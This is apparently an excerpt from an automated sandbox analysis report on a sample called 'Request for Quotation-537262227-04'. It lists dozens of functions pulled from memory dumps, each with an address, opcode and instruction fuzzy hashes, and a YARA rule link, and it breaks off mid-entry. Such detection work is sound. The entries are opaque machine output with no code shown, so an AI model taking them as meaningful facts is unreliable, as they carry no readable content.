                                                • Opcode ID: 90305fef6ce0539bc0f36de51a8ef55d3bd56d3b07f3c312c1787ae82586a15a
                                                • Instruction ID: 2f8f290260dc8fe1e088c7025482e30adbe605bfe57860658444365c9a59a17c
                                                • Opcode Fuzzy Hash: 90305fef6ce0539bc0f36de51a8ef55d3bd56d3b07f3c312c1787ae82586a15a
                                                • Instruction Fuzzy Hash: 2C31D270D15358CFEBA4CF99C944B9EBBF2FB49300F1880A9D409A7254DB385A85DF80
                                                Function 0623D0E0 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05f7cec2bc172ade38d5ed1bf76692f35fc7bd24f97ab723b7d1b41f699243a9
                                                • Instruction ID: 529beacd2fbbc0231fbb636a8527ae7f3be196f116ab72f59b846d0bfd569bdb
                                                • Opcode Fuzzy Hash: 05f7cec2bc172ade38d5ed1bf76692f35fc7bd24f97ab723b7d1b41f699243a9
                                                • Instruction Fuzzy Hash: CC2127B4E2021ADFCB94DFA9C4816AEFBB2FF44300F108969D855A3354D7749A81CF91
                                                Function 063978B3 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 175cd1700c36cb01dd12bc48a17fceb9ca6ebbb4dd668e10605e81e1f7758deb
                                                • Instruction ID: 8368342d7ca53f2acc422bdf96669d13cb2526a85d887577b97e95d7838ec261
                                                • Opcode Fuzzy Hash: 175cd1700c36cb01dd12bc48a17fceb9ca6ebbb4dd668e10605e81e1f7758deb
                                                • Instruction Fuzzy Hash: 6E31F470D65209CFDBA8DF68E584BEDBBB5FB49300F1080A9D01AA7290DB745985CF90
                                                Function 0637DAE6 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 944237a28dea9f48bdb71726192497d1050bb32e29651aba674d5d72b61f1ad2
                                                • Instruction ID: 8fd2231275c02d519a03e87182e4f59252d31aef81c4f5ade6491576540c3077
                                                • Opcode Fuzzy Hash: 944237a28dea9f48bdb71726192497d1050bb32e29651aba674d5d72b61f1ad2
                                                • Instruction Fuzzy Hash: 1F318F70D15228CFEBA0CF59D858BDDB7F2BF5A304F5081AAD449A7680C7785984CF91
                                                Function 06372D70 Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46645249bf1b886337ba8752230b78591d98be1b45e0f0db522a35edeb008006
                                                • Instruction ID: 797ba235658905d968ba692f1737e2655ef53e215ba1b3f614674ed7d8e9c445
                                                • Opcode Fuzzy Hash: 46645249bf1b886337ba8752230b78591d98be1b45e0f0db522a35edeb008006
                                                • Instruction Fuzzy Hash: 7C21A130A102048FC755DF28D884AAEBBF2FF89300F14496AE541D7361DB30ED05CBA1
                                                Function 063978FE Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ee69bc9e8b7aaad85c67144b38d4a5cd6a56ef007ee559c427254e984096938
                                                • Instruction ID: 2068fc7c2d9203e9f864d5fe3934858d3ad0deeba394ee67b2013e9a966b5e1c
                                                • Opcode Fuzzy Hash: 8ee69bc9e8b7aaad85c67144b38d4a5cd6a56ef007ee559c427254e984096938
                                                • Instruction Fuzzy Hash: 0921E470D15219CFDFA4DF69D584BADBBF2FB49300F2050A9D009A3691DB345984CF90
                                                Function 063A2D0C Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78cf630a5e0e0b058f31a6c3220b8d65950e1b0a9667161c5dca259b05eb754c
                                                • Instruction ID: a5532558dc6dd8a6e1b755398bb2d51f78bbdfd2855210a43602352aafd8b747
                                                • Opcode Fuzzy Hash: 78cf630a5e0e0b058f31a6c3220b8d65950e1b0a9667161c5dca259b05eb754c
                                                • Instruction Fuzzy Hash: 0A31C370D11358CFDB54CF99C944B9EBBF2FB49300F1880A9D409A7254DB385A85DF80
                                                Function 0639B320 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9a134d3b704fcfe39af578f3e67f39bc788c2f98fcbcabd8228237561126d7b
                                                • Instruction ID: 5ca21f98c5a03e75caaf4fbb49af9eeb21310aa66b201ad370bb46b46e9f4e11
                                                • Opcode Fuzzy Hash: c9a134d3b704fcfe39af578f3e67f39bc788c2f98fcbcabd8228237561126d7b
                                                • Instruction Fuzzy Hash: 8C119836309391AFC7128F38E8D0A5BBFB9EF86610B1444DAF985CB252C670D815C7A1
                                                Function 0639B6F0 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83cab05ae5fc401aeafd1754cada8ac23ee43c4ff7cb98cae878d4c1f1ac68f7
                                                • Instruction ID: e71ab9fb8f89db481e90caf474dfc3876dcc891eddb9d09af73f66aead3db58a
                                                • Opcode Fuzzy Hash: 83cab05ae5fc401aeafd1754cada8ac23ee43c4ff7cb98cae878d4c1f1ac68f7
                                                • Instruction Fuzzy Hash: 0A118235A102059FDF64DF69E844BAABBF6EF48710F104529E556D7280DA70D845CFE0
                                                Function 0637F2B9 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 152726c35011dd6ea4d96432c71f7ac090a79a3db3495ffdbeb42110cfe8b65d
                                                • Instruction ID: cc875304f0c28b93e23d31b1227060d557994cde76f1f58f5c47b711f707af22
                                                • Opcode Fuzzy Hash: 152726c35011dd6ea4d96432c71f7ac090a79a3db3495ffdbeb42110cfe8b65d
                                                • Instruction Fuzzy Hash: 972142B8D04289CFCB90CFA8D5446EDBBB1FF4A305F2041AAD415A3391C7388A48CF91
                                                Function 009FD006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154691249.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9fd000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c3c2e2cfbd6e8f0803addb412de32aab8ac65aaf195628f245f75d181f0e636
                                                • Instruction ID: 97611c682be977690cfb6f444b59ccc9ef46a5fa739944784cfe0ac0ec08916c
                                                • Opcode Fuzzy Hash: 3c3c2e2cfbd6e8f0803addb412de32aab8ac65aaf195628f245f75d181f0e636
                                                • Instruction Fuzzy Hash: 33218E755093848FCB02CF24D994715BF72EB46314F28C5EAD9498B2A7C33A980ACB62
                                                Function 06397730 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c548c299f38de8fa92b6fe15e9269ad8797716e264c9b10bc3a3140becf3bd0
                                                • Instruction ID: 3575c9e6c6ed0fb5a5a193a4ea12b4251c1fbde050d679134674e11071f34a15
                                                • Opcode Fuzzy Hash: 6c548c299f38de8fa92b6fe15e9269ad8797716e264c9b10bc3a3140becf3bd0
                                                • Instruction Fuzzy Hash: 30216874915219CFEFA4CF68D984BEDBBB6FB89300F1080A9D509A3290DB745984DFA1
                                                Function 0637F1D8 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a90eba0b41cb0094314f50219e2155016330afde558938bd1f8978159cd354b
                                                • Instruction ID: 9b7121ba659e95d8227b83f3d5ec9ec6394ba15f7079f655ee26f0c6982cb88f
                                                • Opcode Fuzzy Hash: 5a90eba0b41cb0094314f50219e2155016330afde558938bd1f8978159cd354b
                                                • Instruction Fuzzy Hash: 02213678D042899FDB90CFA8D9447EEBBB5BF4A300F10956AC405A3281C7789A49CF91
                                                Function 0637DCA7 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f911ae5bcb9b2912397f489298c44d82cb081ea5f4a347f96f71e68f4a01afe
                                                • Instruction ID: c0810186560a369ffcfdf087eafb8abf462396be2b5b7d2170ee74220af1de03
                                                • Opcode Fuzzy Hash: 8f911ae5bcb9b2912397f489298c44d82cb081ea5f4a347f96f71e68f4a01afe
                                                • Instruction Fuzzy Hash: 4A31BF70A14328CFEBA4CF59D858BDAB7F2BF5A304F0081A9D449A7684D7785984CF92
                                                Function 0637F1E8 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba300c92be2b26c41b77bdd74e29badbc67ef37b173aa76f90f36e7318748cf4
                                                • Instruction ID: a46ac2cc9a7da94f149c2bd889fa663caa1a5960a9fb6cb4d14667998066af7d
                                                • Opcode Fuzzy Hash: ba300c92be2b26c41b77bdd74e29badbc67ef37b173aa76f90f36e7318748cf4
                                                • Instruction Fuzzy Hash: 68214478D0424DDFDB90CFA8D8447EEBBB9BF4A300F109169C405A3281CB789A498F91
                                                Function 0637DD06 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 969bfa66f57b388c4534f679194456ae1cd51b155d08fb060771570fe408622d
                                                • Instruction ID: e9ccea143cc27729c1efd9100fb896184671696eef15560cb6dcade15576c622
                                                • Opcode Fuzzy Hash: 969bfa66f57b388c4534f679194456ae1cd51b155d08fb060771570fe408622d
                                                • Instruction Fuzzy Hash: 1A21C270E14228CFEBA4CF59D858BDDBBF2BF5A304F0081AAD449A7250D7785984CF91
                                                Function 0637DDE0 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b621e365baac31189f2cf4f7b01a8f0233a30d2344da7010919f23b6d484648
                                                • Instruction ID: 2a23a2c06627c1a6b07138c38b9c238e44918b828762e304ddcd4367267d76cc
                                                • Opcode Fuzzy Hash: 7b621e365baac31189f2cf4f7b01a8f0233a30d2344da7010919f23b6d484648
                                                • Instruction Fuzzy Hash: 6731BF70D14228CFEBA0CF59C858BDDB7F2BF4A304F0081AAD449A7280C7785985CF91
                                                Function 0637C88F Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a676824452837969f43185519071294b692e8e1ac757ead89e89a4167ec62b57
                                                • Instruction ID: 8aa6fa410f1d65c47001af2c7733ac123491b31d0a8cfab1cb4636a6cea4a2b7
                                                • Opcode Fuzzy Hash: a676824452837969f43185519071294b692e8e1ac757ead89e89a4167ec62b57
                                                • Instruction Fuzzy Hash: 0421B4B4E002698FDBA8CF58CD84BADB7B5AB48301F4484E9D90AA7341EB755E84CF50
                                                Function 009ED49B Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154656848.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ed000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                • Instruction ID: 9de7c8d77723486296d8eb2c1503a96faa4f9e5b7b628ba10148415dd618cf11
                                                • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                • Instruction Fuzzy Hash: 2211D376504280CFDB16CF14D5C4B16BF71FB94324F24C5A9E9090B25AC33AD85ACBA2
                                                Function 06676F7A Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a2b4440e4fd5abd5b09f52da36cd5de32428df3e3669922335295420b636405
                                                • Instruction ID: f7b2935357d4c199008d26e4726f06ec6d14546867fa495bc54573c3ddd0c6d3
                                                • Opcode Fuzzy Hash: 4a2b4440e4fd5abd5b09f52da36cd5de32428df3e3669922335295420b636405
                                                • Instruction Fuzzy Hash: 36318274A05628DFDBA1CF68CD84A9ABBB1FB48305F1181DAE809A7355D730AE80CF51
                                                Function 0637DA95 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43079e124412a11633576d00354f7410573869defa3adbd84b5b18c6b0be430a
                                                • Instruction ID: d7f4623c129f06657338cc1e4e0ac24b561a7333d5eb519f625e9cbcfa126490
                                                • Opcode Fuzzy Hash: 43079e124412a11633576d00354f7410573869defa3adbd84b5b18c6b0be430a
                                                • Instruction Fuzzy Hash: C621B074D14228CFEBA0CF69D858BD9BBF2BF1A304F0080AAD449A7681C7785985CF91
                                                Function 0637EBAC Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7fb25fd3b35481f5bc5fb9f440f3bcfc8634bdeb1d5e6e00cd26a9c2392830a
                                                • Instruction ID: 76e7dabd8862d80a1e0d3c71927eb20b4c8abcad50b036d708c8b2ac105047b2
                                                • Opcode Fuzzy Hash: f7fb25fd3b35481f5bc5fb9f440f3bcfc8634bdeb1d5e6e00cd26a9c2392830a
                                                • Instruction Fuzzy Hash: 10213870D19348DFEBA4CFE5D1843ADBBF6FB49300F1090A9D006AB258DB785988CB81
                                                Function 0639B469 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf97518cefe553ee5ecf0373d31839e0926dfcf49a2a60b835510e0185f332d5
                                                • Instruction ID: 6118fca32e1f847dc18ebccd471846c201c7d142d5ec16f3e36801cbb0e3fe0e
                                                • Opcode Fuzzy Hash: bf97518cefe553ee5ecf0373d31839e0926dfcf49a2a60b835510e0185f332d5
                                                • Instruction Fuzzy Hash: F7216278A42219DFDB04CF98E594EADB7F2BF49300F204158E506AB361CB34AD45CF90
                                                Function 0637DA51 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8620acb5f8ef29772c8052a532b436c24476cd4f74cf0ca7e1ebb9bbae134a10
                                                • Instruction ID: 5140e5e7aa0844f3f51bc5b1e57f9d160e2630dc86c7fb05b9a03f21296adb6f
                                                • Opcode Fuzzy Hash: 8620acb5f8ef29772c8052a532b436c24476cd4f74cf0ca7e1ebb9bbae134a10
                                                • Instruction Fuzzy Hash: D621BF70914328CFEBA4CF59D858BD9B7F2BF1A304F4081A9D449A7690C7789984CF91
                                                Function 0637DB88 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 658d8ae9ad2e19b368b2777909d4de6dc8dae04b7db2f051b69410ba2da833f3
                                                • Instruction ID: 8dbf462dc107d153181d7e2a4b5640a242bb362158db202b6432d91536282b84
                                                • Opcode Fuzzy Hash: 658d8ae9ad2e19b368b2777909d4de6dc8dae04b7db2f051b69410ba2da833f3
                                                • Instruction Fuzzy Hash: A5212570909358CFEB65CF18D858BD9BBB2FF5A304F0081EAD449AB281C3794984CF92
                                                Function 009FD113 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154691249.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9fd000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42ffd1060d4716d88ab02c1f84f02b90d98ab478aa7c1853a2e815d1f450a477
                                                • Instruction ID: 877cfbbeb3a9b0db4977b01ee9fad4fae661a8fab72dcb18317036b8899da98b
                                                • Opcode Fuzzy Hash: 42ffd1060d4716d88ab02c1f84f02b90d98ab478aa7c1853a2e815d1f450a477
                                                • Instruction Fuzzy Hash: 14110876509284CFDB16CF14D9C4B26BF72FB84314F24C1A9DD090B656C33AD81ACBA2
                                                Function 0637DB32 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 564e455741a1a3c2201b9cff23b49bb2c1345d6143fa3d720befc6f21918db47
                                                • Instruction ID: 398678910bd1be9c3a98482cb467e1f805497933b55bd2bceeb692cbc9017883
                                                • Opcode Fuzzy Hash: 564e455741a1a3c2201b9cff23b49bb2c1345d6143fa3d720befc6f21918db47
                                                • Instruction Fuzzy Hash: 5F21B370954318CFEBA4CF58D858BDAB7F2FF1A304F0081AAD449AB690C7785984CF91
                                                Function 066726D0 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74b1f5a34418cc118bc671ec8cc91ffb3402c467cf71e5c581c658f311721222
                                                • Instruction ID: d215a6c83a01de74c3997d06117861f6241e169200fbfe2e7119cf186185debb
                                                • Opcode Fuzzy Hash: 74b1f5a34418cc118bc671ec8cc91ffb3402c467cf71e5c581c658f311721222
                                                • Instruction Fuzzy Hash: 4D21E6B0A14229CFEBA0DF94C848BA9B7B5BB45304F1181E6D02DA3740DB749EC8DF91
                                                Function 0639B348 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82efa3c018df329a0bdbba759bf3b5b1292c76d1edd2ca81cebd949fdcd4fd93
                                                • Instruction ID: cad4344f66fabf00c0b8f72cac3edbc447113da3c84008c2f83a22bfe891fc7b
                                                • Opcode Fuzzy Hash: 82efa3c018df329a0bdbba759bf3b5b1292c76d1edd2ca81cebd949fdcd4fd93
                                                • Instruction Fuzzy Hash: 6C014476350315AFDB108E59EC84F9FB7A9EB89721F10816AFA15CB290C6B1D8118BA0
                                                Function 063997E8 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b76020676e7dd997efc6be150bc0782f48f247c58d964924b96bbc38d3659c10
                                                • Instruction ID: 7349b8683a4ceccc5154d37bf268d1ffe1412cac35029ea70f8df02df4359833
                                                • Opcode Fuzzy Hash: b76020676e7dd997efc6be150bc0782f48f247c58d964924b96bbc38d3659c10
                                                • Instruction Fuzzy Hash: 3A11353090E3949FC752DF78C8A059ABFF0EF46200B1989EBC4C48A2A3D6345A49CB95
                                                Function 06373598 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd9c892b76d26b6a3feda0addb803dd943b05ad26c8dfa0c1c86b3101a4d1502
                                                • Instruction ID: 8ba4f9b6e0da0ef529506208912eb3bbe73c99968043dbe1b101fb8c7898b3da
                                                • Opcode Fuzzy Hash: bd9c892b76d26b6a3feda0addb803dd943b05ad26c8dfa0c1c86b3101a4d1502
                                                • Instruction Fuzzy Hash: 9111A5317047409FD7759B34D894A6A7BA2AFCA320F18496ED4968B391CB75D806DBC0
                                                Function 063A1FD5 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47d170a2edc68173a0ef813df9c05cc65b8f2e9f82dadd72338978dcbd4c2583
                                                • Instruction ID: 028dd3532ccce795594eba65c412decb86cd8624e8134dfcff17d29e2c8d22f2
                                                • Opcode Fuzzy Hash: 47d170a2edc68173a0ef813df9c05cc65b8f2e9f82dadd72338978dcbd4c2583
                                                • Instruction Fuzzy Hash: 1411D471904219DFDB64CF55CD80BEAB7B9BB48300F1480EAE50DA7251DB309A85DF90
                                                Function 06397B10 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb8230e88e780a16a78034029299c3bc423563fa2eb7e790a5d50f3a7b8ce827
                                                • Instruction ID: 6ef6fe96f4b518362651ae087e58bfa7452bd248cfcdec773c902b2dfe9e407a
                                                • Opcode Fuzzy Hash: fb8230e88e780a16a78034029299c3bc423563fa2eb7e790a5d50f3a7b8ce827
                                                • Instruction Fuzzy Hash: 7A210F74920219CFEB64DF68E588BEDBBB2FB44304F1080AAD509A3690DB745D84CF91
                                                Function 0623474C Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
